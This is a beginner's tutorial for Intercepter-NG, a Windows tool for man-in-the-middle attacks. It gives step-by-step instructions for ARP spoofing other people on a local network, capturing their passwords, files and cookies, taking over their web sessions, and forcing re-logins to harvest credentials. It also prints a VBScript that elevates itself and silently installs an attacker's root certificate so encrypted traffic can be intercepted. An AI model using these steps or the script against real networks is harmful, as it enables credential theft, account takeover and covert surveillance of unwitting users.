Sniffer for Windows: Intercepter-NG manual
What is Intercepter-NG
Intercepter-NG is a program for performing man-in-the-middle attacks. There is a large number of programs for such attacks, the main feature that distinguishes Intercepter-NG among the others is that the program was originally written for Windows platforms and works fine in this operating system. In addition, the program features a graphical interface, which contains numerous functions and options related to the man-in-the-middle attack, as well as some other tasks of pentesting.
Thanks to the graphical interface, it is easy to use Intercepter-NG. However, a large number of options and fragmented documentation can confuse a novice user. This manual is written for beginners, perhaps even without the experience of working with similar utilities in Linux.
What can Intercepter-NG
The main task of Intercepter-NG is to perform a man-in-the-middle attack. In a practical sense, the man-in-the-middle attack (it is also called the mediator’s attack) consists in the ability to view the data transmitted by other users on the local network. Among these data can be logins and passwords from web sites. The transmitted data can be analyzed and saved, and also modified on the fly.
To describe the technical essence of this attack, imagine a local network. Such a local network can be several computers in your apartment that are connected to a router. It does not matter whether they are connected by wire or by Wi-Fi. The router receives requests from computers, redirects them, for example, to the Internet, and the received answers are returned back to the computers that sent the requests. In this situation, the router is the gateway.
Due to the attack, called ARP spoofing, the computer starts to consider the gateway not the router, but the attacker’s computer. The attacker receives requests from the ‘victim’ and sends them to the destination (for example, requests the contents of the website on the Internet), receiving a response from the destination, he sends it to the ‘victim’. In this situation, the attacker becomes an intermediary. Intercepter-NG implements the ARP attack and performs it automatically.
The attacker gains access to the data being transmitted and can, for example, retrieve passwords and messages from this data. The process of analyzing transmitted data is called sniffing. In the process of sniffing, Intercepter-NG can:
- Intercept logins and passwords to log on to websites
- Recover transferred data (files)
- Intercept messages from some instant messengers
- See addresses visited by a user
All this works fine only for unencrypted data. If the data is encrypted (HTTPS), then they can not be analyzed without additional actions.
Before connecting to the website, computers query a DNS server (name server) to find out an IP address of the requested host. Intercepter-NG is able to change DNS replies (DNS spoofing), which allows you to redirect a ‘victim’ to fake clones of web sites for subsequent attacks.
This is not all the features of the program. We will get acquainted with other possibilities later in this manual.
Where to download Intercepter-NG
The official site of the Intercepter-NG program is sniff.su. There you can download it. But some browsers mark the site as containing unwanted software. Of course, this does not prevent you from visiting the site, but if you do not want to press a few extra buttons, then another official site where you can download Intercepter-NG is the mirror on GitHab: https://github.com/intercepter-ng/mirror. There are all versions of the program:
- file with the .apk extension is a version for Android (requires root privileges)
- with CE letters is console version
- Intercepter-NG.v*.zip is the main version for Windows
The downloaded program does not need to be installed – just unpack the archive.
The man-in-the-middle attack with Intercepter-NG
Let us start with a normal man-in-the-middle attack.
Let us make small adjustments. Depending on whether you are connected via Wi-Fi or Ethernet (wire), set the desired mode by clicking on the highlighted icon (if connected by wire – select the network card image, if over the wireless network, then select the image with the signal level):
Also open the drop-down list of network adapters (Network Adapter). It works for me when I choose the option with my IP address (i.e. 'Microsoft' on local host: 192.168.0.244):
Right-click on the empty table and select Smart Scan:
A list of targets will be displayed:
Add what you want to attack (Add as Target):
To start sniffing, click the corresponding icon:
Click the MiTM mode tab (this is a globe with patch cords) and click the ARP Poison icon (the symbol of radiation hazard):
In the Password Mode tab (a symbol is a bunch of keys), captured credentials will appear:
On the Resurrection tab (the button with the Phoenix bird) you can see which files were transferred:
We considered a basic attack, which allows to:
- intercept logins and passwords;
- see which sites the user visits and what files they download.
A basic attack involves scanning the local network, selecting targets, launching sniffing, and starting ARP spoofing. With these actions, a number of other, more complex attacks begin.
Login to a web site with intercepted cookies
The program can intercept not only credential data and files. In addition, cookies are intercepted. Using these cookies you can log in as the same user as the victim to the web site without entering a password. Start a basic attack. Go to the Passwords tab (on the keychain icon), right-click an empty table field and tick the Show Cookies:
You will see intercepted cookies:
Click on the record with the right mouse button and select Open in browser – the page visited by the user will open, and you will be logged in under the user who owns the cookie.
Zeroing cookies to provoke user to enter login and password
Cookies can be updated over time, and we will not be able to login with the old cookies on the site. Therefore, we would like to receive a username and password. But while the cookies are working, the user does not need to enter credentials every time, so although the ‘victim’ are using a web site, we cannot intercept his credentials.
In order not to wait until the cookie expires and ones need to enter credentials, we can speed up this process – zeroing out the cookies. For this there is a special option: Cookie Killer.
Cookie Killer clears cookies, thereby forcing the user to reauthorize – enter a username and password so that the attacker can intercept them. The Cookie Killer function also works for SSL connections. There are black (misc\ssl_bl.txt) and whitelists (misc\ssl_wl.txt). In them, you can exclude or alternatively specify IP addresses or domains to which you should or should not use SSL MiTM. If you specify extra ssl port, you do not need to specify the read\write type, just specify the port number. All traffic is written in ssl_log.txt.
You can see how to use this option in this video:
Note: during the test, I was unable to get the Cookie Killer to work, either in the virtual machine or with a separate real computer.
For more information about the various attacks, see the video:
HTTP code injection:
Force files to upload:
The code of the .vbs file mentioned in the video:
Dim str str = "-----BEGIN CERTIFICATE-----MIICFzCCAYACCQCEGK7JTRLonzANBgkqhkiG9w0BAQUFADBQMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxDjAMBgNVBAcTBVRleGFzMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTMwNDAzMTE1OTUzWhcNMjEwNjIwMTE1OTUzWjBQMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxDjAMBgNVBAcTBVRleGFzMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKM+co6MfVJQCrnW1CAMEnPYgbthTZk7hyXf5Qd4ZYJOrQUtF959bjOleDEyy/swA1qezLtH+w9v/Jnmnufd0Ui78ZWMvjlKk3nlagCzSK/1qa/wVtJTFbnr+k1i1GQuMCadYujEDy6MC7IGtiefpjr3JmpMwIlKyTRMmYwsWZ0rAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEARVtNikEQ0Oiy7hw/Y/tysM/IQl6a0XDxcuTxT8o6WJD42KwKTzbgcSQQggp4LXwFNrw2BC9ISiinxXYuBuPMATTrs5LrCeGcogYJFOhUd0YcG/0qjgy60IoFeexWc7iyqpNAG+AQcG0HlXfNan9U1jFyb/YCQuo9gpgl4EVyjr0=-----END CERTIFICATE-----" Set objFSO=CreateObject("Scripting.FileSystemObject") outFile="1.crt" Set objFile = objFSO.CreateTextFile(outFile,True) objFile.Write str objFile.Close Set WshShell = WScript.CreateObject("WScript.Shell") If WScript.Arguments.length = 0 Then Set ObjShell = CreateObject("Shell.Application") ObjShell.ShellExecute "wscript.exe", """" & _ WScript.ScriptFullName & """" &_ " RunAsAdministrator", , "runas", 1 End if Dim objShell Set objShell = WScript.CreateObject ("WScript.shell") objShell.run "certutil -addstore -f Root 1.crt" Set objShell = Nothing
If you only need the certificate, you will find it in the folder of the Intercepter-NG program, the misc\server.crt file.
FATE (fake updates and fake web site):
Obtaining a password from iCloud using Intercepter-NG:
More Intercepter-NG information
Video presentations of the author of the program: https://www.youtube.com/user/0x4553intercepter/videos
The author’s blog, in which he informs about the innovations in the next releases of the program (in Russian): https://habrahabr.ru/users/intercepter/topics/
Official web site and news (in English): http://sniff.su/
- Rogue Wi-Fi AP with mitmAP: setting up and data analysis (71.9%)
- bettercap 2.x: how to install and use in Kali Linux (71.9%)
- Ettercap user manual: man-in-the-middle attack (MitM), password interception, HSTS bypass, data modification on the fly, custom filters and plug-ins usage, BeEF hooks, infection with backdoors (71.9%)
- Wireshark Filters (50%)
- How to install Intercepter-NG in Linux (22.2%)
- How to install NetBeans 9 for JDK 9 development (RANDOM - 1.4%)